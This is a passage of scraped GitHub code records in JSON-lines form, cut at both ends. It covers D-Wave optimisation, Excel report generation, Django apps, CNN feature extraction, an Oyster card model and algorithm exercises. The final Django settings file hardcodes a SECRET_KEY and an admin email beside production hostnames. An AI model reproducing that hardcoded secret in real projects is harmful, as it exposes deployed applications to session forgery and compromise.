sys.exit()\n\nprint(-1)\n","repo_name":"combiJihoon/AlgorithmStudy","sub_path":"elice/test3-2.py","file_name":"test3-2.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71048485174","text":"import dwave\nimport dwavebinarycsp\nfrom dwave.embedding import embed_qubo\n\nfrom dwave.system import DWaveSampler\nfrom dwave_networkx import chimera_graph\n\nfrom utils.jobshop_helpers import ones_from_sample\nfrom utils.jobshopproblem import JobShopProblem, pruned_number\n\njob_shop_problem = JobShopProblem.from_data([[2, 1], [1,2]], 2, 4)\n\njob_shop_problem.add_starts_once_constraint()\njob_shop_problem.add_one_job_one_machine_constraint()\njob_shop_problem.add_operations_order_constraint()\n\n\nprint(job_shop_problem.qubo)\nprint(job_shop_problem.qubo_pruned)\n# Q, offset = dwavebinarycsp.stitch(job_shop_problem.csp, max_graph_size=16, min_classical_gap=0.6).to_qubo()\n#\n# response = QBSolv().sample_qubo(job_shop_problem.qubo_pruned, solver=sampler, solver_limit=30)\n\nlinear = {}\nquadratic = {}\nqubits_number = pruned_number\nfor i in range(qubits_number):\n linear['x{}'.format(i), 'x{}'.format(i)] = int(job_shop_problem.qubo_pruned[i, i])\nfor i in range(qubits_number):\n for j in range(i + 1, qubits_number):\n val = job_shop_problem.qubo_pruned[i, j]\n if (val != 0):\n quadratic['x{}'.format(i), 'x{}'.format(j)] = int(val)\n\nQ = dict(linear)\nQ.update(quadratic)\n\nprint(Q)\n\nembedding = {}\n\nemb_numbers = []\n# print(job_shop_problem.row_length)\ncells_number = int(qubits_number/4)\nfor i in range(cells_number):\n tmp = []\n # row\n for j in range(1,i + 1 + 1,1):\n tmp.append(i * 128 + 4 * (2 * j - 1))\n for j in range(i,cells_number):\n tmp.append(j * 128 + i * 8)\n emb_numbers.append(tmp)\n\n# for i,num in enumerate(emb_numbers):\n# print(\"i={}, numbers: {}\".format(i,num))\n\nfor num, arr in enumerate(emb_numbers):\n for i in range(4):\n tmp_embedding = set()\n for elem in sorted(arr):\n tmp_embedding.add(elem + i + 16)\n\n # tmp_embedding.add(elem + i)\n # print(\"Num: {}, arr: {}, i: {}, embedding: {}\".format(num, sorted(arr), i, sorted(tmp_embedding)))\n\n embedding['x{}'.format(4 * num + i)] = tmp_embedding\n # print(\"x{}: {}\".format(4 * num + i, sorted(tmp_embedding)))\n\n# embedding = {'x0': {0,4}, 'x1': {1,5}, 'x2': {2,6}, 'x3': {3,7}}\n\n\n# response = EmbeddingComposite(DWaveSampler()).sample_qubo(Q, num_reads=1000)\n#\n\ntQ = dwave.embedding.embed_qubo(Q, embedding, chimera_graph(16), chain_strength=7.8)\n\nresponse = DWaveSampler().sample_qubo(tQ, num_reads=200)\n\nfor s in list(response.data()):\n print(ones_from_sample(s.sample), \"Energy: \", s.energy, \"Occurrences: \", s.num_occurrences)\n#\n#\n\nprint(\"UNEMBEDED RESULTS\")\nsource_bqm = dwavebinarycsp.dimod.BinaryQuadraticModel.from_qubo(Q)# (linear, quadratic, 0, Vartype.BINARY)\nsuma = 0\nfor i, val in enumerate(dwave.embedding.unembed_sampleset(response, source_bqm=source_bqm, embedding=embedding)):\n suma += list(response.data())[i].num_occurrences\n print(ones_from_sample(val), list(response.data())[i].num_occurrences, list(response.data())[i].energy, suma)\n","repo_name":"dawtom/quantum_optimization","sub_path":"working/small_JS_pruned_handEmbedded.py","file_name":"small_JS_pruned_handEmbedded.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10380747965","text":"import xml.etree.ElementTree as ET \r\nimport xlsxwriter\r\nimport os.path\r\nimport openpyxl\r\npath = 'C:\\\\users\\\\robi\\\\desktop\\\\dir\\\\rest\\\\SoapUIResults'\r\nnum_files = len([f for f in os.listdir(path)if os.path.isfile(os.path.join(path, f))])\r\nnum=num_files/2\r\nwb = openpyxl.load_workbook(\"C:\\\\users\\\\robi\\\\desktop\\\\new1.xlsx\") \r\nsheet = wb['ACTUAL'] \r\n#clm = sheet.max_column\r\nrwnm = len([row for row in sheet if not all([cell.value == None for cell in row])]) + 1\r\n#clm = len([column for column in sheet if not all([cell.value == None for cell in column])]) + 2\r\n#print(clm)\r\na=0\r\ni=1\r\nfor j in range(1,int(num+1)):\r\n dom = ET.parse(\"C:\\\\users\\\\robi\\\\desktop\\\\dir\\\\rest\\\\SoapUIResults\\\\response_\"+str(j) +\".xml\")\r\n returnCode = dom.find('returnCode').text\r\n returnMessage = dom.find('returnMessage').text\r\n sheet.cell(row = rwnm, column= 6).value=int(returnCode)\r\n sheet.cell(row = rwnm, column= 7).value=returnMessage\r\n orderz = dom.findall('orders/order')\r\n a=a+(len(orderz))\r\n while i < a+1:\r\n for c in orderz:\r\n # matchingSample = c.find('matchingSample').text\r\n orderCode = c.find('orderCode').text\r\n orderCodeMnemonic = c.find('orderCodeMnemonic').text \r\n returnCode = c.find('returnCode').text\r\n returnMessage = c.find('returnMessage').text\r\n # stabilityFlag = c.find('stabilityFlag').text\r\n #print (matchingSample,orderCode,orderCodeMnemonic)\r\n # outsheet.write(i,0,matchingSample)\r\n sheet.cell(row = rwnm, column= 2).value=int(orderCode)\r\n sheet.cell(row = rwnm, column= 3).value=orderCodeMnemonic\r\n sheet.cell(row = rwnm, column= 4).value=int(returnCode)\r\n sheet.cell(row = rwnm, column= 5).value=returnMessage\r\n i += 1 \r\n rwnm=rwnm+1\r\n#print(returnCode)\r\n#print(returnMessage)\r\n# outsheet.write(\"A1\",\"MATCHING SAMPLE\")\r\n# outsheet.write(\"B1\",\"orderCode\")\r\n# outsheet.write(\"C1\",\"orderCodeMnemonic\")\r\n# outsheet.write(\"A2\",matchingSample)\r\n# outsheet.write(\"B2\",orderCode)\r\n# outsheet.write(\"C2\",orderCodeMnemonic)\r\nwb.save(\"C:\\\\users\\\\robi\\\\desktop\\\\new1.xlsx\") \r\n","repo_name":"ramitrehal/ADT_addtest","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17688455851","text":"#coding:utf8\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^save_db_info/$', views.save_db_info, name='save_db_info'),\n url(r'^table_list/$', views.table_list, name='table_list'),\n url(r'^generate_code/$', views.generate_code, name='generate_code'),\n url(r'^generate_markdown/$', views.generate_markdown, name='generate_markdown'),\n]","repo_name":"t3573393/django_admin_db_reverse","sub_path":"django_project/db_reverse/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35833431301","text":"#!/usr/bin/env python3\r\n\r\nimport os\r\nimport sys\r\nimport threading\r\nimport numpy as np\r\nimport yaml\r\nimport pickle\r\nimport pdb\r\nimport re\r\nfrom PIL import Image, ImageFile\r\nimport torch\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport torch.utils.data as data\r\nimport torchvision.models as models\r\nfrom torchvision.models import resnet50\r\nfrom torchvision.models import resnet18\r\nfrom torchvision import transforms\r\nfrom joblib import Parallel, delayed\r\n\r\nimport threading\r\nimport time\r\nimport multiprocessing\r\n\r\nImageFile.LOAD_TRUNCATED_IMAGES = True\r\n\r\n\r\ndef get_cnn_features_from_image(img, cnn_feat_video_filename):\r\n # Receives filename of downsampled video and of output path for features.\r\n # Extracts features in the given keyframe_interval. Saves features in pickled file.\r\n print(\"Processing {}\".format(cnn_feat_video_filename))\r\n x = Variable(transform(img))\r\n x = x.unsqueeze(0)\r\n my_embedding = torch.zeros(1, 2048, 1, 1)\r\n\r\n def copy_data(m, i, o):\r\n my_embedding.copy_(o.data)\r\n\r\n h = layer.register_forward_hook(copy_data)\r\n h_x = model(x)\r\n h.remove()\r\n z = my_embedding.data.numpy()\r\n z = z.squeeze(-1).squeeze(-1)\r\n np.savez(cnn_feat_video_filename, z)\r\n print(\"Saved {}\".format(cnn_feat_video_filename))\r\n\r\n\r\ndef chunkIt(seq, num):\r\n avg = len(seq) / float(num)\r\n out = []\r\n last = 0.0\r\n\r\n while last < len(seq):\r\n out.append(seq[int(last):int(last + avg)])\r\n last += avg\r\n\r\n return out\r\n\r\n\r\ndef get_cnn_features(fread):\r\n i = 0\r\n for image_name in fread:\r\n image_filename = os.path.join(image_folder_path, image_name)\r\n cnn_feat_filename = os.path.join(cnn_features_folderpath, image_name)\r\n try:\r\n img = Image.open(image_filename).convert('RGB')\r\n if not os.path.isfile(image_filename):\r\n print(\"{} File not found!\".format(image_filename))\r\n continue\r\n if os.path.exists(cnn_feat_filename+\".npz\"):\r\n # print(\"{} Skipped\".format(cnn_feat_filename))\r\n continue\r\n get_cnn_features_from_image(img,\r\n cnn_feat_filename)\r\n except:\r\n print(\"{} Exception\".format(image_filename))\r\n continue\r\n i += 1\r\n if i%500==0:\r\n print(\"Processed {}\".format(i))\r\n\r\n\r\nif __name__ == '__main__':\r\n print(sys.argv)\r\n if len(sys.argv) != 3:\r\n print(\"Usage: {0} video_list config_file\".format(sys.argv[0]))\r\n print(\"video_list -- file containing video names\")\r\n print(\"config_file -- yaml filepath containing all parameters\")\r\n exit(1)\r\n\r\n image_folder_path = sys.argv[1]\r\n cnn_features_folderpath = sys.argv[2]\r\n\r\n if not os.path.exists(cnn_features_folderpath):\r\n os.mkdir(cnn_features_folderpath)\r\n\r\n # Loop over all videos (training, val, testing)\r\n # TODO: get SURF features for all videos but only from keyframes\r\n\r\n fread = [f for f in os.listdir(image_folder_path)] #if re.match(r'[0-9]+.*\\.jpg', f)]\r\n print(len(fread))\r\n lines = chunkIt(fread, 1)\r\n print(len(lines))\r\n i = 0\r\n\r\n _transforms = list()\r\n _transforms.append(transforms.Resize((256, 256)))\r\n _transforms.append(transforms.CenterCrop(224))\r\n _transforms.append(transforms.ToTensor())\r\n transform = transforms.Compose(_transforms)\r\n\r\n arch = \"resnet50\"\r\n model_file = '%s_places365.pth.tar' % arch\r\n if not os.access(model_file, os.W_OK):\r\n weight_url = 'http://places2.csail.mit.edu/models_places365/' + model_file\r\n os.system('wget ' + weight_url)\r\n\r\n model = models.__dict__[arch](num_classes=365)\r\n checkpoint = torch.load(model_file, map_location=lambda storage, loc: storage)\r\n state_dict = {str.replace(k,'module.',''): v for k,v in checkpoint['state_dict'].items()}\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n layer = model._modules.get('avgpool')\r\n\r\n # cnn.cuda()\r\n print(\"Initialized!\")\r\n # Remove final classifier layer\r\n start = time.time()\r\n print(\"Time: {}\".format(start))\r\n\r\n Parallel(n_jobs=16)(delayed(get_cnn_features)(line) for line in lines)\r\n # thread = [None for _ in range(len(lines))]\r\n # my_embedding = [None for _ in range(len(lines))]\r\n #\r\n # for i in range(0, len(thread)):\r\n # print(len(lines[i]))\r\n # thread[i] = threading.Thread(target=get_cnn_features,\r\n # args=(lines[i],))\r\n #\r\n # for i in range(0, len(thread)):\r\n # thread[i].start()\r\n #\r\n # for i in range(0, len(thread)):\r\n # thread[i].join()\r\n\r\n print(\"Time: {}\".format(time.time()-start))","repo_name":"richcode6/Visual-Storytelling","sub_path":"cnn_feat_extraction.py","file_name":"cnn_feat_extraction.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12477436193","text":"from oyster.trip import Trip\n\n\nclass NotEnoughBalance(Exception):\n pass\n\n\nclass Card:\n \"\"\"\n Class that models a Oyster card with its main functions\n\n Parameters\n ----------\n balance : float\n current balance of the oyster card\n trip : Trip\n instance of class trip\n\n Attributes\n ----------\n tube_max_fare : float\n max fare for tube service\n bus_max_fare : float\n max fare for bus service\n \"\"\"\n tube_max_fare = 3.20\n bus_max_fare = 1.80\n\n def __init__(self, balance=0):\n self.balance = balance\n self.trip = Trip()\n\n def top_up(self, amount):\n \"\"\"Top up card with an amount or adds difference between max fare and trip fare to the balance.\n\n Parameters\n ----------\n amount : float\n The amount to top up\n \"\"\"\n self.balance += amount\n\n def subtract_amount(self, amount):\n \"\"\"Subtracts trip price from the balance.\n\n Parameters\n ----------\n amount : float\n The amount to subtract\n station_name : str\n Should the fuels refilled to cover the distance?\n \"\"\"\n self.balance -= amount\n\n def view_balance(self):\n \"\"\"Shows remaining balance to stdout.\n\n Returns\n -------\n self.balance\n Current balance in the card\n \"\"\"\n return 'The balance left in your card is: £{}'.format('%.2f' % self.balance)\n\n def swipe_in(self, trip_type, station_name=None):\n \"\"\"Subtracts max fare from the balance and sets trip type and origin station name.\n\n Parameters\n ----------\n trip_type : str\n Type of trip\n station_name : str\n Name of origin station\n\n Raises\n ------\n NotEnoughBalance\n Not Enough Balance\n \"\"\"\n if trip_type == 'tube' and 0 <= self.balance < self.tube_max_fare:\n raise NotEnoughBalance(\n 'Sorry but you do not have enough balance.\\nCurrent balance: £{}\\n Please top up your card.'.format(\n self.balance))\n elif trip_type == 'bus' and 0 <= self.balance < self.bus_max_fare:\n raise NotEnoughBalance(\n 'Sorry but you do not have enough balance.\\nCurrent balance: £{}\\n Please top up your card.'.format(\n self.balance))\n self.subtract_amount(self.tube_max_fare) if trip_type == 'tube' else self.subtract_amount(self.bus_max_fare)\n self.trip.type = trip_type\n self.trip.orig_station = station_name\n\n def swipe_out(self, station_origin_zone, station_destination_zone):\n \"\"\"Calculates proper fare and replace the charged max fare with it.\n\n Parameters\n ----------\n station_origin_zone : str\n Origin station zone\n station_destination_zone : str\n Destination station zone\n \"\"\"\n fare = self.trip.calculate_trip_fare(station_origin_zone, station_destination_zone)\n self.top_up(self.tube_max_fare - fare)\n\n @classmethod\n def increase_tube_or_bus_max_fare_price(cls, service_type, price):\n \"\"\"Updates tube or bus max fare price.\n\n Parameters\n ----------\n price : float\n Price of the new max fare\n service_type : str\n Type of service\n \"\"\"\n if service_type == 'tube':\n cls.tube_max_fare = price\n else:\n cls.bus_max_fare = price\n","repo_name":"TravisClub/oyster-card","sub_path":"oyster/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6626887937","text":"from collections import deque\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, -1, 1]\n\nt = int(input())\n\ndef bfs(ground, x, y):\n que = deque()\n ground[x][y]=0\n que.append((x,y))\n\n while que:\n\n a, b = que.popleft()\n for po in range(4):\n dxx = a + dx[po]\n dyy = b + dy[po]\n if -1.show()\npt2 = r'\\.destroy\\(\"' # .destroy()\npt3 = r'\\.update\\(\"'\n# .update(, , )\n\n# Inbuilt Models\nModels = [\"BaseModel\", \"User\", \"State\", \"City\",\n \"Amenity\", \"Place\", \"Review\"]\n\n\ndef update_line_check(line):\n \"\"\"\n checks condition for update features\n\n Args:\n line: string representation of command\n\n Returns:\n Bool: True if conditions passes else False\n \"\"\"\n if line[-2:] == '\")' or line[-1] == \")\" and \\\n line[-2].isnumeric() or line[-1] == \")\":\n return True\n else:\n return False\n\n\ndef update_line_dict_check(line):\n \"\"\"\n checks condition for update features for dictionaries\n\n Args:\n line: string representation of command\n\n Returns:\n Bool: True if conditions passes else False\n \"\"\"\n if re.search(dictionary_pattern, line):\n return True\n else:\n return False\n\n\ndef update_to_dict(line):\n \"\"\"\n handles parsing of command from commandline\n for updating with dictionary\n\n Args:\n line: string representation of command\n\n Returns:\n Tuple: class name, uuid, dictionary\n \"\"\"\n uuid_match = re.search(uuid_pattern, line)\n dictionary_match = re.search(dictionary_pattern, line)\n class_name_match = re.search(class_name_pattern, line)\n\n cls_name = class_name_match.group()\n cls_name = cls_name[:-7]\n\n uuid = uuid_match.group()\n\n d = dictionary_match.group()\n d = d.replace(\"'\", '\"')\n d = json.loads(d)\n\n return cls_name, uuid, d\n\n\ndef check_all_conditions(line):\n \"\"\"\n checks condition for .show, .destroy and .update features\n\n Args:\n line: string representation of command\n\n Returns:\n Bool: True if conditions passes else False\n \"\"\"\n if re.finditer(f'{pt1}|{pt2}|{pt3}', line) and \\\n line[-2:] == '\")' or re.finditer(r'\\d\\)$', line[-2]):\n return True\n else:\n return False\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"The HBNBCommand class is a subclass of the cmd.Cmd class in Python.\n\n This class provides a command-line interface for interacting with the\n application. It includes methods for various commands like create,\n show, destroy, update, etc.\n\n Attributes:\n prompt (str): The prompt to display in the command-line interface.\n\n Methods:\n do_quit(line): Quit command to exit the program.\n do_EOF(line): Exit the program when EOF is reached (Ctrl+D).\n emptyline(): Override the default behavior of emptyline.\n do_create(line): Creates a new instance of a class based on the\n input argument.\n help_create(): Provides assistance or guidance in\n creating something.\n do_show(line): Display information about an instance.\n help_show(): Display information about the show command.\n do_destroy(line): Deletes an instance based on the id\n and class name.\n help_destroy(): Display information about the destroy command.\n do_all(line): Prints all instances of a class.\n help_all(): Display help text for the command all().\n do_update(line): Performs an update operation on an\n instance's attributes.\n help_update(): Display help text for the command update().\n default(line): Handles custom commands.\n \"\"\"\n prompt = \"(hbnb) \"\n\n def do_quit(self, line):\n \"\"\"Quit command to exit the program\n \"\"\"\n return True\n\n def do_EOF(self, line):\n \"\"\"Exit the program when EOF is reached (Ctrl+D)\n \"\"\"\n return True\n\n def emptyline(self):\n \"\"\"Override the default behavior of emptyline.\n \"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of a class based on the input argument.\n\n Args:\n line (str): The input command string.\n\n If the class name is missing, it prints '** class name missing **'.\n\n \"\"\"\n if not line:\n print(\"** class name missing **\")\n return\n\n try:\n new_instance = eval(line.split()[0])()\n new_instance.save()\n print(new_instance.id)\n except Exception:\n print(\"** class doesn't exist **\")\n\n def help_create(self):\n \"\"\"\n provides assistance or guidance in creating something.\n \"\"\"\n print('\\n'.join(['create [Model]',\n 'Creates a new instance of an inbuilt Model',\n 'If the class name is missing\\n\\t'\n 'print ** class name missing **']))\n\n def do_show(self, line):\n \"\"\"Display information about an instance.\n\n Args:\n line (str): The input command string.\n\n If the class name or instance id is missing, it prints\n the appropriate message.\n \"\"\"\n args = line.split()\n lth = len(args)\n if lth < 1:\n print(\"** class name missing **\")\n return\n elif lth < 2:\n print(\"** instance id missing **\")\n return\n class_name = False\n try:\n instance = storage.all()\n for i, k in instance.items():\n if k[\"__class__\"] == args[0]:\n class_name = True\n if k[\"id\"] == args[1]:\n print(k)\n return\n\n if class_name:\n print(\"** no instance found **\")\n else:\n print(\"** class doesn't exist **\")\n except Exception:\n pass\n\n def help_show(self):\n \"\"\"\n display information or documentation about the\n show command\n \"\"\"\n print('\\n'.join(['show [Model] ',\n 'Prints the string representation of an instance',\n 'based on the class name and id']))\n\n def do_destroy(self, line):\n \"\"\"Deletes an instance based on the id and class name.\n\n Args:\n line (str): The input command string.\n\n If the class name or instance id is missing, it prints the\n appropriate message.\n \"\"\"\n args = line.split()\n lth = len(args)\n if lth < 1:\n print(\"** class name missing **\")\n return\n elif lth < 2:\n print(\"** instance id missing **\")\n return\n\n instance = storage.all()\n class_name = False\n instance_id = False\n for i, k in instance.items():\n if k[\"__class__\"] == args[0]:\n class_name = True\n if k[\"id\"] == args[1]:\n instance_id = True\n break\n\n if instance_id and class_name:\n try:\n del instance[f\"{args[0]}.{args[1]}\"]\n with open(\"models/engine/instances.json\", \"w\",\n encoding=\"utf-8\") as file:\n json.dump(instance, file)\n storage.reload()\n except Exception:\n pass\n elif class_name:\n print(\"** no instance found **\")\n else:\n print(\"** class doesn't exist **\")\n\n def help_destroy(self):\n \"\"\"\n prints help text to STDOUT about the destroy command.\n \"\"\"\n print('\\n'.join(['destroy [Model] ',\n 'Deletes an instance',\n 'based on the class name and id']))\n\n def do_all(self, line):\n \"\"\"Prints all instances of a class.\n\n Args:\n line (str): The input command string.\n\n If the class name is missing or the class doesn't exist,\n it prints the appropriate message.\n \"\"\"\n args = line.split()\n if len(args) == 1:\n class_present = False\n for key, value in storage.all().items():\n if value[\"__class__\"] == args[0]:\n class_present = True\n if class_present:\n print([f\"[{value['__class__']}] ({value['id']}) {value}\"\n for value in storage.all().values()\n if value[\"__class__\"] == args[0]])\n elif not class_present:\n print(\"** class doesn't exist **\")\n elif len(line) < 1:\n print([f\"[{value['__class__']}] ({value['id']}) {value}\"\n for value in storage.all().values()])\n else:\n self.default(line)\n\n def help_all(self):\n \"\"\"\n prints Help text for the command all()\n \"\"\"\n print('\\n'.join(['all',\n 'all [Model]',\n 'Prints all string representation of all '\n 'instances',\n 'based or not on the class name.']))\n\n def do_update(self, line):\n \"\"\"Performs an update operation on an instance's attributes.\n\n Args:\n line (str): The input command string.\n\n If the class name, instance id, attribute name,\n or value is missing, it prints the appropriate message.\n \"\"\"\n args = line.split()\n length = len(args)\n if length == 3:\n print(\"** value missing **\")\n return\n elif length == 2:\n print(\"** attribute name missing **\")\n return\n elif length == 1:\n print(\"** instance id missing **\")\n return\n elif length == 0:\n print(\"** class name missing **\")\n if len(args) >= 4:\n instance = storage.all()\n class_name = False\n instance_id = False\n for i, k in instance.items():\n if k[\"__class__\"] == args[0]:\n class_name = True\n if k[\"id\"] == args[1]:\n instance_id = True\n\n if instance_id and class_name:\n try:\n old = instance[f\"{args[0]}.{args[1]}\"]\n value = args[3]\n value = value.replace('\"', '')\n if value.isdigit():\n if float(value).is_integer():\n value = int(float(value))\n else:\n value = float(value)\n old[args[2]] = value\n new_instance = eval(args[0])(**old)\n storage.new(new_instance)\n return\n except Exception:\n pass\n if class_name and not instance_id:\n print(\"** no instance found **\")\n return\n elif not class_name:\n print(\"** class doesn't exist **\")\n\n def help_update(self):\n \"\"\"\n prints Help text for the command update()\n \"\"\"\n print('\\n'.join(['update',\n 'updates an instance,'\n 'based on class name, '\n 'id, attribute name and value']))\n\n def default(self, line):\n \"\"\"Handles custom commands.\n \"\"\"\n try:\n if line.find(\".all()\") != -1:\n st_idx = line.find(\".all()\")\n self.do_all(line[:st_idx])\n elif line.find(\".count()\") != -1:\n st_idx = line.find(\".count()\")\n i = 0\n class_present = False\n for key, value in storage.all().items():\n if value[\"__class__\"] == line[:st_idx]:\n class_present = True\n i += 1\n if class_present:\n print(i)\n elif not class_present:\n print(\"** class doesn't exist **\")\n elif check_all_conditions(line):\n call = True\n match = re.finditer(f'{pt1}|{pt2}|{pt3}', line)\n for mat in match:\n if mat.group() == '.destroy(\"':\n call = False\n st_idx = line.find('.destroy(\"')\n if line[-2:] == '\")':\n command = (f\"{line[:st_idx]} \"\n f\"{line[st_idx + 10:-2]}\")\n self.do_destroy(command)\n else:\n super().default(line)\n elif mat.group() == '.show(\"':\n call = False\n st_idx = line.find('.show(\"')\n if line[-2:] == '\")':\n command = (f\"{line[:st_idx]} \"\n f\"{line[st_idx + 7:-2]}\")\n self.do_show(command)\n else:\n super().default(line)\n elif mat.group() == '.update(\"':\n call = False\n if update_line_dict_check(line):\n cls_name, u_id, dic = update_to_dict(line)\n for key, value in dic.items():\n command = (f\"{cls_name} {u_id} \"\n f\"{key} {value}\")\n self.do_update(command)\n elif update_line_check(line):\n my_list = []\n split_text = re.split(r'[\\s, \", \\, \\), \\(]',\n line)\n for arg in split_text:\n if arg != '':\n my_list.append(arg)\n my_list[0] = my_list[0][:-7]\n list_length = len(my_list)\n if list_length > 0:\n class_name = my_list[0]\n command = class_name\n if list_length > 1:\n instance_id = my_list[1]\n command += f\" {instance_id}\"\n if list_length > 2:\n attribute_name = my_list[2]\n command += f\" {attribute_name}\"\n if list_length > 3:\n attribute_value = my_list[3]\n command += \\\n f\" {attribute_value}\"\n self.do_update(command)\n else:\n self.do_update(command)\n else:\n self.do_update(command)\n else:\n self.do_update(command)\n else:\n pass\n else:\n super().default(line)\n if call:\n super().default(line)\n else:\n super().default(line)\n except IndexError as e:\n super().default(line)\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"Ossai6/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":16033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74546079412","text":"from time import time\n#O(n^3)\ndef find_m(alist):\n start = time()\n global_max = 0\n for i in range(len(alist)):\n local_max = 0\n for j in range(i, len(alist)):\n sum = 0\n for k in range(i, j+1):\n sum += alist[k]\n local_max = local_max if local_max > sum else sum\n global_max = local_max if local_max > global_max else global_max\n end = time() - start\n return (global_max, end)\n\n#O(n^2)\ndef find_m2(alist):\n start = time()\n global_max = 0\n for i in range(len(alist)):\n local_max, sum = 0, 0\n for j in range(i, len(alist)):\n sum += alist[j]\n local_max = sum if sum > local_max else local_max\n global_max = local_max if local_max > global_max else global_max\n end = time() - start\n return (global_max, end)\n\n#O(nlogn)\ndef find_m3(alist):\n if len(alist) == 1:\n return max(alist[0], 0)\n\n mid = 0 + (len(alist) - 0) // 2\n left_max = find_m3(alist[:mid])\n right_max = find_m3(alist[mid:])\n max_leftright = max(left_max, right_max)\n\n sum_a, max_leftborder= 0, 0\n for i in range(mid, -1, -1):\n sum_a += alist[i]\n max_leftborder = sum_a if sum_a > max_leftborder else max_leftborder\n\n sum_b, max_rightborder = 0, 0\n for j in range(mid+1, len(alist)):\n sum_b += alist[j]\n max_rightborder = sum_b if sum_b > max_rightborder else max_rightborder\n return max(max_leftright, max_leftborder+max_rightborder)\n\n#O(n)\ndef find_m4(alist):\n local_max = alist[0]\n global_max = 0\n for i in range(1, len(alist)):\n local_max += alist[i]\n local_max = max(alist[i], local_max)\n global_max = max(local_max, global_max)\n return global_max\n\n\nif __name__ == '__main__':\n a = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\n start = time()\n result_1 = find_m(a)\n end_1 = time() - start\n start = time()\n result_2 = find_m2(a)\n end_2 = time() - start\n start = time()\n result_3 = find_m3(a)\n end_3 = time() - start\n start = time()\n result_4 = find_m4(a)\n end_4 = time() - start\n print(result_1, result_2, result_3, result_4, end_1, end_2, end_3, end_4)","repo_name":"yuzhecd/al_py","sub_path":"Divide_conquer/Find_maxsequence.py","file_name":"Find_maxsequence.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6160589978","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('documents', '0009_auto_20151119_1609'),\n ('curriculum', '0008_auto_20160116_1428'),\n ('resources', '0005_resourceset_lessons'),\n ('artifacts', '0008_auto_20151119_1609'),\n ('scholars', '0004_auto_20151023_0933'),\n ('connections', '0007_auto_20171109_1548'),\n ('maps', '0007_auto_20151022_2133'),\n ('videos', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='video',\n name='artifacts',\n field=models.ManyToManyField(verbose_name='Artifacts related to this item', blank=True, to='artifacts.Artifact'),\n ),\n migrations.AddField(\n model_name='video',\n name='audiovisuals',\n field=models.ManyToManyField(verbose_name='Related Media (slimbox)', blank=True, to='connections.Audiovisual'),\n ),\n migrations.AddField(\n model_name='video',\n name='biblio',\n field=models.ManyToManyField(verbose_name='Further Study (slimbox)', blank=True, to='connections.Biblio'),\n ),\n migrations.AddField(\n model_name='video',\n name='connections',\n field=models.ManyToManyField(verbose_name='Related PDFs (new tab)', blank=True, to='connections.Connection'),\n ),\n migrations.AddField(\n model_name='video',\n name='documents',\n field=models.ManyToManyField(verbose_name='Documents related to this item', blank=True, to='documents.Document'),\n ),\n migrations.AddField(\n model_name='video',\n name='essays',\n field=models.ManyToManyField(verbose_name='Background Info (slimbox)', blank=True, to='connections.Essay'),\n ),\n migrations.AddField(\n model_name='video',\n name='lectures',\n field=models.ManyToManyField(verbose_name='Lectures (full page)', blank=True, to='scholars.Lecture'),\n ),\n migrations.AddField(\n model_name='video',\n name='lessons',\n field=models.ManyToManyField(verbose_name='Lesson PDFs (new tab)', blank=True, to='curriculum.Lesson'),\n ),\n migrations.AddField(\n model_name='video',\n name='maps',\n field=models.ManyToManyField(verbose_name='Maps (full page)', blank=True, to='maps.Geomap'),\n ),\n migrations.AddField(\n model_name='video',\n name='resourcesets',\n field=models.ManyToManyField(verbose_name='Choose Resource Sets this item belongs to', blank=True, to='resources.Resourceset'),\n ),\n migrations.AddField(\n model_name='video',\n name='weblinks',\n field=models.ManyToManyField(blank=True, to='connections.Weblink'),\n ),\n migrations.AlterField(\n model_name='video',\n name='video_source',\n field=models.CharField(verbose_name='source url', max_length=128, blank=True, default=''),\n ),\n ]\n","repo_name":"DigitalGizmo/mse21","sub_path":"mse/videos/migrations/0002_auto_20171127_1445.py","file_name":"0002_auto_20171127_1445.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38180442856","text":"import os\nimport datetime\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSECRET_KEY = 's$g^n1!&9wg(2^m)ls1&8#vgl3z3_48qb-fi08l&ey&w4$d5kp'\nDEBUG = False\nADMINS = [('Shun', 'klon.unicorn@gmail.com')]\nMANAGERS = ADMINS\nALLOWED_HOSTS = [\n 'localhost',\n '127.0.0.1',\n 'klon-production.ap-northeast-1.elasticbeanstalk.com',\n 'd2lsr90acgtyop.cloudfront.net',\n 'klongroup.com',\n]\nALLOWED_CIDR_NETS = 